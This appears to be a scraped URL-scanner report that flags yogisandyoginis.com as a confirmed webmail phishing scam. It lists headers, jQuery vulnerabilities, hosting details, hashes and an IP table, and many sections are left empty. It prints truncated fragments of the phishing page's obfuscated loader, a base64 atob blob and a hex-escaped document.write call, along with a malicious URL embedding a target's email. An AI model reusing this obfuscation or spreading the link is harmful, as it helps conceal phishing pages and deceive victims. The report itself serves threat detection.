phishing scam

documentation technical

adult content

English

Within the commercial generic top-level domain (.com), 'yogisandyoginis.com' is registered while skipping any subdomain. Count 15 characters in 'yogisandyoginis' with 6 vowels and nine consonants. Word splitting yields four words: yogis, and, yogin, is. Median word length comes out to 4 characters. No strong language cues emerged from the frequency lists.

username

pdf2

html/f3/b0/f3b002b6-17a1-4218-9575-e8387e3b0c1b.html.gz

upgrade-insecure-requests;
upgrade-insecure-requests;

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers

85556761a8800d14ced8fcd41a6b8b26bf012d44a318866c0d81a62092efd9bf

05b85d96f41fff14d8f608dad03ab71e2c1017c2da0914d7c59291bad7a54f8e

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution

passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

Regex in its jQuery.htmlPrefilter sometimes may introduce XSS

jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates

parseHTML() executes scripts in event handlers

8031ea95c2104fa4d10a1bfd44b0734c7492616a0aa7b687a78ce853efa35987

463722cc114d07f6452f2bfd70e77510abc516fc595fd635cc73f57b51510766

992eb81c93436e42264da62054958fa69b36931e7cd9574532066617ae8fd3e5

robots

googlebot

googlebot-news

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://webui-test chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types lottie-worker-script-loader webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

GoDaddy.com, LLC

YOGISANDYOGINIS.COM

ORG-HOA1-RIPE

Martin Hetzner

HOS-GUN

Hetzner Online GmbH

Dennis Diehm

Guenther Mueller

Martin Fritzsche

Stephan Konvickova

Sebastian Krannich

HETZNER-fsn1-dc2


var data = atob("PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0MlNjglNzQlNkQlNkMlMjAlNkMlNjElNkUlNjclM0QlMjIlNjUlNkUlMjIlM0UlMEElMjAlMjAlMjAlMjAlM0MlNjglNjUlNjElNjQlM0UlME

document.write(unescape('%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%22%3E%0A%20%20%20%20%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%6F%62%6F%74%73%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%

PasswordField

Sucuri

HTTP/3

Shopify

Webmail Portal Access

☠️ Malicious - https://yogisandyoginis.com/zcrcrmi.htm#hej@bloggz.se

Requests	IP Address	Location	AS Autonomous System
3	178.63.16.224	Falkenstein, Saxony, Germany	AS24940Hetzner Online GmbH
1	142.251.141.100	United States	AS15169Google LLC
1	154.197.211.164	United States	AS135097LUOGELANG FRANCE LIMITED
1	23.227.39.200	Ottawa, Ontario, Canada	AS13335Cloudflare, Inc.
1	142.250.186.74	United States	AS15169Google LLC
1	151.101.194.137	United States	AS54113Fastly, Inc.
1	192.124.249.10	Menifee, California, United States	AS30148Sucuri
1	172.64.147.188	United States	AS13335Cloudflare, Inc.
1	142.251.127.95	United States	AS15169Google LLC
11	9	-	-

Security Scan Report: yogisandyoginis.com

Summary

AI Security Verdict

Confirmed Scam

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies4

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History